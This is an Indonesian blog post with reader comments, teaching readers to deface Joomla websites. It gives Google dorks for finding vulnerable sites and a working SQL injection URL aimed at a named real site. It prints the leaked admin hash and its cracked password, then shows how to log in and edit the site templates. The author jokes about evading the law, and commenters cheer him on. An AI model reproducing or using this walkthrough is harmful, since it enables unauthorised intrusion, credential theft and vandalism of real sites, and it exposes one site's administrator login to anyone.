pengetahuan baruku ^^

ssalamu’alaikum semua……..

apa kabar???

halah kebanyakan basa basi lu dave….. heheheheh

Abisnya lama banget neh ga nulis di blogku inih. Rencananya sih, mau bikin web sendiri…

ternya belum bisa no what what lah. Sekarang aku mau berbagi pengetahuan baruku setelah beberapa minggu nggak nge-blog.

What’s the fuck of hell is that???

bahasa biasa aja atuh…………

belajar deface web yang pake sistem joomla yuk (dah pada tahu kan apa itu deface?kalau ga tahu silahkan googling dulu deh)

Tapi… jangan bilang siapa-siapa, ntar gw kena UU ITE

kapan mulainya????

ini juga baru mau mulai

kita belajar via public exploit yang di milw0rm aja ya.

ok. Let started.

1. Buka milw0rm

2. Klik link Search.

3. ketikkan joomla

4. Pilih exploit yang mau digunakan… (untuk hal ini, pilih yang akhirannya SQL Injection Vulnerability )

Ok, aku kasih contoh. yang kupakai adalah Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability. Nah sekarang klik itu, maka akan terpampang tulisan awut awutan

kita fokuskan ke tulisan dork dan exploit

dork adalah kata kunci pencarian targe di google dan exploit, adalah script atau link atau apalah yang digunakan oleh cracker ( ya kita ini ). Dah, kebanyakan basa basi.

5. Cari target. Karena ada dua dork, yaitu

1. inurl: “com_alphacontent”
2. “AlphaContent 2.5.8 © 2005-2008 – visualclinic.fr”

maka pilih salah satunya. (info : ane pake yang pertama ). Taruh di google,lalu search! Nah,tinggal pilih, site mana yang bakal kau rusak (dan bisa dirusak tentunya karena ga semuanya bisa dirusak)

ok,got it!. aku pilih

http://www.scoutsnsr.org/nsr/index.php?option=com_alphacontent&Itemid=56α=m&section=all&cat=all

lihat exploit yang tadi. exploit tersebut adalah:

index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*

5. Exploitasi

Sisipkan exploit pada url target menjadi

http://www.scoutsnsr.org/nsr/index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*

ada perbedaan yang mencolok di site tersebut???see above, pada title websitenya.

scoutsnsr.org - admin>60a74d46ec9853a243a953dc361a1227

hoho…itu adalah username administator dan passwordnya tapi kok passwordnya gitu?

yup! itulah yang dinamakan MD5 kita harus crack MD5 itu dulu. But how?

remember, google adalah mesin pencari yang sangat hebat. Coba aja cari dulu di goole dengan memasukkan md5 yang di encrypt itu…

ok,do it now! searching…

gotcha!!! ada!!!

60a74d46ec9853a243a953dc361a1227:nabuco2

how how how….my lucky day.sekarang masuk ke sistemnya

how?

site yang memakai sistem joomla/mambo.letak page administrator login adalah

http://%5Bsite%5D/administrator

jadi,untuk masuk ke page login administrator web di atas, adalah

http://www.scoutsnsr.org/nsr/administrator/

joomla spanish. (pada bisa spanish ga neh? )

so what gitu lho

sekarang masukkan username dan passwordna.

username : admin

password : nabuco2

enter!

gotcha!!! this site was owned!!! look of the top! sistema poseído!!!

6. Finishing eh salah, Defacing

dah, pelajari sendiri aja tuh system joomla. ga tahu bahasanya?les dulu!!!

kalau mau deface, arahkan pointer ke sitio / site >> Administrador de Plantillas / Template Manager >> Plantillas de Sitio / Site Templates. Nah disana, ada beberapa template yang dipake administratornya. Pilih defaultnya (kalau di site di atas, defaultnya JA Antares ) lalu Edit HTML. Terserah deh, mau ente apain tuh site. Silahkan ekslporasi sendiri deh mau ente design gimana tuh site.

dah ah, kalau masih bingung, via comment atau Y!M aja yah

maunya si bikin tutor video, tapi ga punya softnya

takut dikejar cyber interpol, kabur aja ah…………

pengetahuan tak akan kita bawa sampai mati, jadi bagikanlah

9 comments so far

  1. venom injector on

    wedew kk nunjukin giginya ya kk
    wew,……………………..
    tapi kok d4vidnya ya
    kok bukan ,………….

    ups,……

    .::kabooor::.

  2. nenyok on

    Salam
    Keren keren keren😀

  3. Ly on

    *garuk…garukk….* gak ngertiiiiii…. hikzz…..
    om…om…david…. mau les doonk….😀

  4. Ly on

    tapii….. keren laaahh… ilmunya semoga bermanfaat u/ qt semuaaaaaaaa… yeeeeeeeeaaaahh *bravoooooooooo…..*

  5. Akhina Ifa on

    Asslm
    Makasih dave dah di sebarin tuh cara nge- deface… hihihi
    (belajar dimanaseh😀 ) Apa mungkin karena ana ngak berbakat jadi hacker… apa mungkin malah sebaliknya😀 . BTW lah …
    Mantep deh dave…
    Ngomong2x anta dah hutang berapa sama UU ITE hahaha Maap, Peace Okeh.. Jaga diri dan cepet dapetin bidadarimu

  6. cewek_culun on

    asyiiik..dapat pengetahuan baru…*tralla..laa…la…*

  7. aibnu on

    ….ra mudeng…meneh

  8. fajare_aja on

    tapi klu di google MD5 g ada ?? gimana cara terjemahinnya ???hayuu

    • dave on

      ya cari aja di forum2 hacking. atau bruteforce😀


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: